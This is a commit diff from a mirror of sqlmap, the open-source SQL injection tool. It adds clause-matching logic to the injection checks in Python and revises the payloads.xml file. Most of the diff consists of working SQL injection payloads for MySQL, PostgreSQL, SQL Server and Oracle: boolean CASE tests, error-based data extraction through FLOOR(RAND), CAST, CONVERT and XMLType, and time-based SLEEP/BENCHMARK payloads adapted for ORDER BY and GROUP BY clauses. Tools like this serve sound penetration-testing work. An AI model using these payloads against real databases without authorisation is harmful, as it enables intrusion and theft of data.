sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-26 11:33:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

Major bug fix for test on ORDER BY and GROUP BY clauses.

Browse Source 
Minor bug fix to skip following tests if they do not match any of the clause previously identified (injection.clause value).
This commit is contained in:
Bernardo Damele 2010-12-03 12:00:03 +00:00
parent 827a0aea05
commit 4dec049c22
3 changed files with 49 additions and 50 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
lib/controller/checks.py
View File

@ -94,6 +94,7 @@ def checkSqlInjection(place, parameter, value):
for test in conf.tests: for test in conf.tests:
title = test.title title = test.title
stype = test.stype stype = test.stype
clause = test.clause
# Skip test if the risk is higher than the provided (or default) # Skip test if the risk is higher than the provided (or default)
# value # value
@ -145,6 +146,22 @@ def checkSqlInjection(place, parameter, value):
logger.debug(debugMsg) logger.debug(debugMsg)
continue continue
# Skip test if it does not match the same SQL injection clause
# already identified by another test
# Parse test's <clause>
clauseMatch = False
for clauseTest in clause:
if injection.clause is not None and clauseTest in injection.clause:
clauseMatch = True
break
if clause != [ 0 ] and injection.clause and not clauseMatch:
debugMsg = "skipping test '%s' because the clause " % title
debugMsg += "differs from the clause already identified"
logger.debug(debugMsg)
continue
infoMsg = "testing '%s'" % title infoMsg = "testing '%s'" % title
logger.info(infoMsg) logger.info(infoMsg)
@ -340,6 +357,7 @@ def checkSqlInjection(place, parameter, value):
injection.ptype = ptype injection.ptype = ptype
injection.prefix = prefix injection.prefix = prefix
injection.suffix = suffix injection.suffix = suffix
injection.clause = clause
if "epayload" in test: if "epayload" in test:
epayload = "%s%s" % (test.epayload, comment) epayload = "%s%s" % (test.epayload, comment)

1
lib/core/datatype.py
View File

@ -70,6 +70,7 @@ def injectionDict():
injection.ptype = None injection.ptype = None
injection.prefix = None injection.prefix = None
injection.suffix = None injection.suffix = None
injection.clause = None
# data is a dict with stype as key and a tuple as value with # data is a dict with stype as key and a tuple as value with
# title, where, comment and reqPayload # title, where, comment and reqPayload

80
xml/payloads.xml
View File

@ -393,16 +393,6 @@ Formats:
</boundary> </boundary>
<!-- End of WHERE clause boundaries --> <!-- End of WHERE clause boundaries -->
<!-- GROUP BY and ORDER BY clauses boundaries -->
<boundary>
<level>2</level>
<clause>2,3</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>,</prefix>
<suffix></suffix>
</boundary>
<!-- End of GROUP BY and ORDER BY clauses boundaries -->
<!-- Login forms to use with OR-based tests boundaries --> <!-- Login forms to use with OR-based tests boundaries -->
<boundary> <boundary>
@ -604,16 +594,6 @@ Formats:
<suffix></suffix> <suffix></suffix>
<comment>--</comment> <comment>--</comment>
</boundary> </boundary>
<boundary>
<level>2</level>
<clause>2,3</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>,</prefix>
<suffix></suffix>
<comment>--</comment>
</boundary>
<!-- End of login forms to use with OR-based tests boundaries --> <!-- End of login forms to use with OR-based tests boundaries -->
@ -662,10 +642,10 @@ Formats:
<where>1</where> <where>1</where>
<epayload></epayload> <epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
</request> </request>
<response> <response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison> <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -682,10 +662,10 @@ Formats:
<where>1</where> <where>1</where>
<epayload></epayload> <epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request> </request>
<response> <response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison> <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response> </response>
<details> <details>
<dbms>MySQL</dbms> <dbms>MySQL</dbms>
@ -701,10 +681,10 @@ Formats:
<where>1</where> <where>1</where>
<epayload></epayload> <epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request> </request>
<response> <response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison> <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response> </response>
<details> <details>
<dbms>Microsoft SQL Server</dbms> <dbms>Microsoft SQL Server</dbms>
@ -720,10 +700,10 @@ Formats:
<where>1</where> <where>1</where>
<epayload></epayload> <epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
</request> </request>
<response> <response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison> <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
</response> </response>
<details> <details>
<dbms>Oracle</dbms> <dbms>Oracle</dbms>
@ -741,10 +721,10 @@ Formats:
<where>1</where> <where>1</where>
<epayload></epayload> <epayload></epayload>
<request> <request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload> <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
</request> </request>
<response> <response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison> <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
</response> </response>
</test> </test>
@ -1046,15 +1026,15 @@ Formats:
<!-- Error-based tests - GROUP BY and ORDER BY clauses --> <!-- Error-based tests - GROUP BY and ORDER BY clauses -->
<test> <test>
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title> <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (append)</title>
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload> <epayload>, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
<request> <request>
<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload> <payload>, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@ -1066,15 +1046,15 @@ Formats:
</test> </test>
<test> <test>
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title> <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (append)</title>
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>0</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload> <epayload>, (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
<request> <request>
<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload> <payload>, (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@ -1085,15 +1065,15 @@ Formats:
</test> </test>
<test> <test>
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title> <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (append)</title>
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload> <epayload>, (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
<request> <request>
<payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload> <payload>, (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@ -1104,15 +1084,15 @@ Formats:
</test> </test>
<test> <test>
<title>Oracle error-based - ORDER BY clause</title> <title>Oracle error-based - ORDER BY clause (append)</title>
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>0</risk>
<clause>3</clause> <clause>3</clause>
<where>1</where> <where>1</where>
<epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload> <epayload>, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
<request> <request>
<payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload> <payload>, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
</request> </request>
<response> <response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@ -1123,7 +1103,7 @@ Formats:
</test> </test>
<test> <test>
<title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title> <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (replace)</title>
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>0</risk>
@ -1143,7 +1123,7 @@ Formats:
</test> </test>
<test> <test>
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title> <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace)</title>
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>0</risk>
@ -1162,7 +1142,7 @@ Formats:
</test> </test>
<test> <test>
<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title> <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace)</title>
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>0</risk>
@ -1181,7 +1161,7 @@ Formats:
</test> </test>
<test> <test>
<title>Oracle error-based - ORDER BY clause</title> <title>Oracle error-based - ORDER BY clause (replace)</title>
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>0</risk>
@ -1437,7 +1417,7 @@ Formats:
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload> <epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
<request> <request>
@ -1457,7 +1437,7 @@ Formats:
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload> <epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
<request> <request>
@ -1525,7 +1505,7 @@ Formats:
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload> <epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
<request> <request>
@ -1545,7 +1525,7 @@ Formats:
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,2,3</clause>
<where>1</where> <where>1</where>
<epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload> <epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
<request> <request>